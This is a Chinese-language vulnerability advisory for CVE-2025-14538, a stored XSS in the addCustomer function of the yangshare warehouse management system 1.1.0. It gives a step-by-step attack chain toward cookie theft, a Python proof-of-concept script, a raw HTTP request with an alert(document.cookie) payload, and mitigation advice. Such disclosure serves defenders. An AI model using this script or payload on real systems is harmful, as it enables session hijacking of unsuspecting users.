CVE-2025-14538 yangshare仓库管理系统addCustomer函数XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14538

漏洞类型

XSS (跨站脚本攻击)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

yangshare warehouseManager 仓库管理系统 1.1.0

漏洞概述

CVE-2025-14538是一个影响yangshare仓库管理系统1.1.0版本的存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于CustomerManageHandler.java文件中的addCustomer函数，攻击者可以通过在客户名称（Name）参数中注入恶意JavaScript代码，当其他用户访问相关页面时，恶意脚本将在其浏览器上下文中执行，从而窃取会话Cookie、劫持用户会话或进行钓鱼攻击。由于该漏洞需要低权限用户认证才能利用，且需要用户交互触发，因此CVSS评分仅为3.5，属于低危级别。然而，存储型XSS漏洞的危害性在于恶意代码会被永久存储在服务器端，所有访问该数据的用户都可能受到攻击，潜在影响范围较广。漏洞已公开披露并可能已被在野利用，建议相关用户尽快采取修复措施。

技术细节

该漏洞是一个典型的存储型跨站脚本（Stored XSS）漏洞，存在于yangshare仓库管理系统的客户管理模块中。具体来说，CustomerManageHandler.java文件中的addCustomer函数在处理客户名称（Name）参数时，未对用户输入进行充分的HTML实体编码或输入验证。攻击者可以通过构造恶意Payload（如：<script>alert(document.cookie)</script>）作为客户名称，当系统将该数据存储到数据库后，其他用户在查看客户列表或相关页面时，浏览器会将其解析为HTML并执行其中的JavaScript代码。由于addCustomer函数是系统的核心业务功能，攻击者只需拥有低权限账户即可利用此漏洞。成功利用后，攻击者可窃取受害者的会话令牌、修改页面内容或进行进一步的社会工程攻击。修复方案应在输出时对所有用户可控的数据进行HTML编码，并实施严格的输入验证机制。

攻击链分析

STEP 1

步骤1

攻击者获取系统低权限账户并登录仓库管理系统

STEP 2

步骤2

访问客户管理模块，构造包含恶意JavaScript代码的客户名称参数

STEP 3

步骤3

通过addCustomer函数提交恶意Payload，服务器未进行输入过滤直接存储到数据库

STEP 4

步骤4

当其他用户（如管理员）访问客户列表页面时，恶意代码被浏览器解析执行

STEP 5

步骤5

攻击者通过XSS窃取受害者的会话Cookie或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # CVE-2025-14538 PoC - Stored XSS in yangshare warehouseManager # Target: CustomerManageHandler.java addCustomer function target_url = "http://target-server/warehouseManager/customer/add" # Malicious payload for XSS xss_payload = "<script>alert(document.cookie)</script>" # Authentication data (low privilege user) auth_data = { "username": "attacker", "password": "password123" } # Customer data with XSS payload in Name field customer_data = { "Name": xss_payload, "Email": "[email protected]", "Phone": "1234567890", "Address": "Test Address" } def exploit(): """Exploit the stored XSS vulnerability in addCustomer function""" # Login first session = requests.Session() login_resp = session.post(f"{target_url}/../login", data=auth_data) if login_resp.status_code == 200: # Add customer with XSS payload add_resp = session.post(f"{target_url}", data=customer_data) if add_resp.status_code == 200: print("[+] XSS payload injected successfully!") print("[*] Payload will execute when victim views customer list") else: print("[-] Failed to inject payload") else: print("[-] Authentication failed") if __name__ == "__main__": exploit() # Alternative: Direct request to trigger XSS # POST /customer/addCustomer HTTP/1.1 # Host: target-server # Content-Type: application/x-www-form-urlencoded # # Name=<script>alert(document.cookie)</script>&[email protected]

影响范围

yangshare warehouseManager 仓库管理系统 1.1.0

防御指南

临时缓解措施

在等待官方修复期间，可临时采取以下措施：在Web服务器层面配置输入过滤规则，对Name参数中的特殊字符<、>、'、"等进行转义或过滤；限制低权限用户对客户管理模块的访问权限；启用HTTPOnly和Secure标志保护Cookie；增加日志监控以检测异常的XSS攻击尝试。建议尽快联系厂商获取官方安全补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14538
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14538
3 Details https://www.cvedetails.com/cve/CVE-2025-14538/
4 VulDB https://vuldb.com/cve/CVE-2025-14538
5 Link https://gitee.com/yangshare/warehouseManager/issues/ID9NAU
6 Link https://vuldb.com/?ctiid.335877
7 Link https://vuldb.com/?id.335877
8 Link https://vuldb.com/?submit.703736